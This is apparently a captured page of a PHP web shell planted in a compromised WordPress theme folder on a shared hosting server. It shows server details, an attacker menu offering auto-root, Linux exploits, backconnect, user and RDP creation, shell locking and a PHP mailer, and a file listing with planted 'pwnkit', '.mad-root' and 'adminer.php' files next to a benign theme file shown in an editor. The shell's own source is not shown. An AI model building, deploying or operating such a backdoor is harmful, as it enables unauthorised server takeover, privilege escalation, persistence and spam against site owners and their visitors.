Linux webm003.cluster131.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.131.20.3 | : 216.73.217.69
Cant Read [ /etc/named.conf ]
7.4.33
anoukpx
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
anoukpx /
www /
wp-content /
themes /
always /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
customizer
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
custom-functions.php
69.78
KB
-rw-r--r--
metabox.php
18.83
KB
-rw-r--r--
pagination.php
7.78
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
single-related-posts.php
4.59
KB
-rw-r--r--
template-tags.php
14.37
KB
-rw-r--r--
term-meta.php
4.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single-related-posts.php
<?php /** * Related Posts Functions. * * @package Always */ if( !function_exists('always_related_posts') ): // Single Posts Related Posts. function always_related_posts(){ $always_default = always_get_default_theme_options(); if( ( is_single() && 'post' === get_post_type() || is_404() ) ){ if( is_404() ){ $related_posts_query = new WP_Query( array('post_type' => 'post', 'posts_per_page' => 3,'post__not_in' => get_option("sticky_posts") ) ); }else{ $current_id = ''; $article_wrap_class = ''; global $post; $current_id = $post->ID; $cats = get_the_category( $post->ID ); $category = array(); if( $cats ){ foreach( $cats as $cat ){ $category[] = $cat->term_id; } } $related_posts_query = new WP_Query( array( 'post_type' => 'post', 'posts_per_page' => 6, 'post__not_in' => array( $post->ID ), 'category__in' => $category ) ); } $ed_related_post = absint( get_theme_mod( 'ed_related_post',$always_default['ed_related_post'] ) ); if( ( $ed_related_post || is_404() ) && $related_posts_query->have_posts() ): ?> <div class="theme-block related-posts-area"> <?php $related_post_title = esc_html( get_theme_mod( 'related_post_title',$always_default['related_post_title'] ) ); if( $related_post_title ){ ?> <h3 class="theme-block-title"> <?php echo esc_html( $related_post_title ); ?> </h3> <?php } ?> <div class="related-posts"> <?php while( $related_posts_query->have_posts() ): $related_posts_query->the_post(); $featured_image = wp_get_attachment_image_src( get_post_thumbnail_id(),'medium' ); $featured_image = isset( $featured_image[0] ) ? $featured_image[0] : ''; ?> <div class="related-post-item"> <div class="wrapper-inner"> <?php if( has_post_thumbnail() ): ?> <div class="column column-4"> <div class="entry-thumbnail"> <a href="<?php the_permalink(); ?>" > <span class="data-bg data-bg-small" data-background="<?php echo esc_url( $featured_image ); ?>"> </span> </a> </div> </div> <?php endif; ?> <div class="column column-8"> <div class="post-content"> <div class="entry-meta theme-meta-categories"> <?php always_entry_footer( $cats = true, $tags = false, $edits = false ); ?> </div> <header class="entry-header"> <h3 class="entry-title entry-title-medium"> <a href="<?php the_permalink(); ?>" rel="bookmark"> <?php the_title(); ?> </a> </h3> </header> <div class="entry-meta"> <?php always_posted_by(); always_posted_on(); ?> </div> </div> </div> </div> </div> <?php endwhile; ?> </div> </div> <?php wp_reset_postdata(); endif; } } endif; add_action( 'always_navigation_action','always_related_posts',20 );
Close